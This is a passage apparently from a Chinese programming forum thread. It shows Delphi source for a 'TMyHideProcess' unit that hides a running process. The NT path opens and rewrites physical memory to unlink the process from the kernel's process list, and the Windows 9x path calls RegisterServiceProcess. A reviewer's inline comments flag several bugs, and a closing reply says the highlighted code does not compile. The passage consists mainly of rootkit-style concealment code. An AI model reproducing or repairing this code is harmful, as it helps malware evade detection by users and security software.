    read is used as a pointer), and CloseNTDLL is called here as well as from
    Destroy. }
  if InitNTDLL() then
  begin
    if (OpenPhysicalMemory()=0) then
    begin
      result:= FALSE;
      exit;
    end;
    thread:=GetData(PVOID($FFDFF124));
    process:=GetData(PVOID(thread+$22c));
    fw:=GetData(PVOID(process+$a0));     // Flink
    bw:=GetData(PVOID(process+$a4));     // Blink
    SetData(PVOID(fw+4),bw);             // next.Blink := prev
    SetData(PVOID(bw),fw);               // prev.Flink := next
    UnmapViewOfFile(g_pMapPhysicalMemory);
    CloseHandle(g_hMPM);
    CloseNTDLL();
  end;
  result:= TRUE;
end;
{ Windows 9x path: calls kernel32's RegisterServiceProcess(current PID,
  RSP_SIMPLE_SERVICE) and drops the library reference again.
  NOTE(review): the GetProcAddress result is not checked; the export is absent
  on NT-based Windows, where RegisterService is nil and the call faults. }
procedure TMyHideProcess.HideProcess98();
type pRegisterService=function (a,b:DWORD):boolean; stdcall;
var
  hKernel : HMODULE ;
  RegisterService: pRegisterService ;
begin
  hKernel := LoadLibrary('kernel32.dll');
  if(hKernel>0) then
  begin
    @RegisterService :=GetProcAddress(hKernel,'RegisterServiceProcess');
    RegisterService(GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
    FreeLibrary(hKernel);
    hKernel :=0;
  end;
end;

end.
{ Re-post of OpenPhysicalMemory from the unit above, token for token (most
  likely the part the follow-up says does not compile).  The same findings
  apply:
  - '\\Device\\PhysicalMemory' is a Pascal literal, so each separator is two
    backslashes; the kernel object name is wrong.
  - 'if status=0' treats STATUS_SUCCESS (0) as failure and every error as
    success, then calls MapViewOfFile on an unopened handle.
  - the retry statuses are not checked, and $30000 is a Windows 2000 x86
    page-directory assumption.
  - STATUS_ACCESS_DENIED is a positive Cardinal literal compared with a
    Longint status; confirm the comparison is done in 32 bits. }
function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
  status: NTSTATUS ;
  physmemString:UNICODE_STRING;
  attributes:OBJECT_ATTRIBUTES;
begin
  RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));
  attributes.Length := sizeof(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;
  status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
  if(status = STATUS_ACCESS_DENIED) then
  begin
    // Widen the DACL with SetPhyscialMemorySectionCanBeWrited, then retry.
    status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
  end;
  if status=0 then
  begin
    result:= 0;
    exit;
  end;
  g_pMapPhysicalMemory := MapViewOfFile(
    g_hMPM,
    4,         // FILE_MAP_READ
    0,
    $30000,    // assumed physical address of the page directory
    $1000);
  if( g_pMapPhysicalMemory = nil ) then
  begin
    result:=0;
    exit ;
  end;
  result:= g_hMPM;
end;
楼上的在不在？
红色标出的那部分代码编译不过去。